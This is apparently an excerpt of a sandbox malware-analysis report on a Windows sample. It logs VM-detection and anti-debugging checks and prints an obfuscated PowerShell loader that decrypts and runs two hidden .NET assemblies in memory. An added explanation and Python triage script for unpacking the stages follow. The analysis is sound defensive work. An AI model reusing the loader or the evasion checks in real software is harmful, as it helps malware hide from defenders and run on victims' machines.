                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs - .Net Code: _F6A9_24CA_2622_EF60_FFFD contains sample name check
                    Source: C:\Windows\System32\wbem\WMIC.exe - WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3208
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6690
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 - Thread sleep count: 3208 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 - Thread sleep count: 6690 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240 - Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe - Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF776D12034
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe - Code function: 0_2_00007FF776D16710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF776D16710
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.10.dr - Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware, Inc.
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.10.dr - Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.dr - Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.10.dr - Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.dr - Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.10.dr - Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.10.dr - Binary or memory string: vmci.sys
                    Source: Amcache.hve.10.dr - Binary or memory string: vmci.syshbin`
                    Source: Amcache.hve.10.dr - Binary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.10.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware20,1
                    Source: Amcache.hve.10.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.dr - Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.10.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.10.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.dr - Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.dr - Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.10.dr - Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Windows\System32\wbem\WMIC.exe - Process information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process queried: DebugFlags
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process queried: DebugPort
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe - Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF776D11D10
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe - Code function: 0_2_00007FF776D18A1E SetUnhandledExceptionFilter,0_2_00007FF776D18A1E
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe - Code function: 0_2_00007FF776D18714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF776D18714

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread register set: target process: 5840
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread register set: 5840 1
                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH 
= 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
                    Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh 
= 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh 
= 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] ('')); Jump to behavior
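The process-creation entry above is a PowerShell stage loader. It reads its own batch file (vclib.bat), takes the first line that begins with ":: " (a batch comment, so cmd.exe ignores it), splits that line on "\", base64-decodes each part, AES-CBC/PKCS7-decrypts it with a hard-coded key and IV, gunzips the result and hands the bytes to [System.Reflection.Assembly]::Load, then invokes the assembly's entry point; it does this for two chunks, so two .NET assemblies are loaded in memory. Class and member names are hidden by splitting them with the filler token blck and joining them back with .replace('blck', '') inside invoke-expression. The script below is an added triage helper written for this page, not code from the report or from the sample: it rebuilds the plain script from the logged text (for any filler token, not only blck), recovers the key and IV, locates the carrier line in a batch file and prints the openssl pipeline that performs the same decryption offline, so nothing from the sample has to be executed. The loader excerpt is copied from the entry above; the batch content it parses is constructed, with placeholder bytes standing in for the two ciphertexts, and the function names and the stageN.bin / stageN.dll file names are this example's own. One caveat a practitioner will hit: the report's listing appears to be case-folded (every identifier, and the base64 key and IV with them, is lower-case), and base64 is case-sensitive, so the values recovered from this page decode to the right lengths but not necessarily to the right bytes; take them from the dropped vclib.bat itself.

```python
"""Static triage for the vclib.bat PowerShell stage loader (added example, stdlib only).

It decrypts nothing itself: it recovers the loader's parameters and emits the
equivalent openssl pipeline so the stages can be unpacked without running the loader.
"""
import base64
import re

# Excerpt of the logged command line, copied (case-folded, as the report shows it)
# from the "Process created" entry above.  Only the crypto setup and the split strings
# are kept; the rest of the loader is not needed for parameter recovery.
LOADER = (
    "function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); "
    "$mjrur.mode=[system.security.cryptography.ciphermode]::cbc; "
    "$mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; "
    "$mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); "
    "$mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); }"
    "function ogptr($kxght){ "
    "invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); "
    "invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); }"
    "function vcyyt($kxght,$goojw){ "
    "invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); "
    "invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); "
    "invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', ''); }"
)

# invoke-expression '<split string>'.replace('<token>', '')  ->  <joined string>
IEX_SPLIT = re.compile(r"invoke-expression\s+'([^']*)'\.replace\('(\w+)',\s*''\);?", re.I)
# $var.key=[system.convert]::frombase64string('...')  (same shape for .iv)
B64_PARAM = r"\.{name}=\[system\.convert\]::frombase64string\('([^']+)'\)"


def deobfuscate(script: str) -> str:
    """Join every token-split string in place and drop its invoke-expression wrapper."""
    return IEX_SPLIT.sub(lambda m: m.group(1).replace(m.group(2), ""), script)


def aes_params(script: str):
    """Return (key_b64, iv_b64) exactly as the loader assigns them."""
    key = re.search(B64_PARAM.format(name="key"), script, re.I)
    iv = re.search(B64_PARAM.format(name="iv"), script, re.I)
    if not (key and iv):
        raise ValueError("AES key/IV assignment not found")
    return key.group(1), iv.group(1)


def carrier_chunks(bat_text: str):
    """Base64-decode the backslash-separated blobs on the first ':: ' line of the batch file."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [base64.b64decode(part) for part in line[3:].split("\\")]
    raise ValueError("no ':: ' carrier line in batch file")


def openssl_recipe(key_b64: str, iv_b64: str, infile: str, outfile: str) -> str:
    """The loader's AES-CBC/PKCS7 decrypt followed by gunzip, as an offline openssl pipeline."""
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    cipher = {16: "aes-128-cbc", 24: "aes-192-cbc", 32: "aes-256-cbc"}[len(key)]
    if len(iv) != 16:
        raise ValueError("AES IV must be 16 bytes")
    return (f"openssl enc -d -{cipher} -K {key.hex()} -iv {iv.hex()} -in {infile}"
            f" | gunzip > {outfile}")


# Constructed batch file with the same carrier layout as vclib.bat (launch line omitted);
# the two blobs are placeholder bytes, not real ciphertext.
FAKE_STAGES = [bytes(range(48)), bytes(range(100, 132))]
SAMPLE_BAT = "@echo off\r\n:: " + "\\".join(
    base64.b64encode(s).decode() for s in FAKE_STAGES) + "\r\n"


def triage(script: str, bat_text: str) -> dict:
    """Everything an analyst needs before touching the ciphertext."""
    key_b64, iv_b64 = aes_params(script)
    chunks = carrier_chunks(bat_text)
    return {
        "script": deobfuscate(script),
        "key_bytes": len(base64.b64decode(key_b64)),
        "iv_bytes": len(base64.b64decode(iv_b64)),
        # PKCS7 ciphertext is always a whole number of 16-byte AES blocks
        "chunk_sizes": [len(c) for c in chunks],
        "block_aligned": all(len(c) % 16 == 0 for c in chunks),
        "recipes": [openssl_recipe(key_b64, iv_b64, f"stage{i}.bin", f"stage{i}.dll")
                    for i in range(len(chunks))],
    }


if __name__ == "__main__":
    result = triage(LOADER, SAMPLE_BAT)
    print(result["script"])
    for k in ("key_bytes", "iv_bytes", "chunk_sizes", "block_aligned"):
        print(f"{k}: {result[k]}")
    print("\n".join(result["recipes"]))
```

To use it on the real artefacts, replace LOADER with the full command line from the dropped vclib.bat (not from this listing, for the case-folding reason above) and SAMPLE_BAT with the file's content, write each base64 chunk of the ":: " line to stageN.bin with a base64 decoder, and run the printed openssl lines; the outputs are the two assemblies the loader would have passed to Assembly.Load, ready for a .NET decompiler. With the page's values the key decodes to 32 bytes, so the recipe selects aes-256-cbc.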
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Code function: 0_2_00007FF776D11258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle | 0_2_00007FF776D11258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
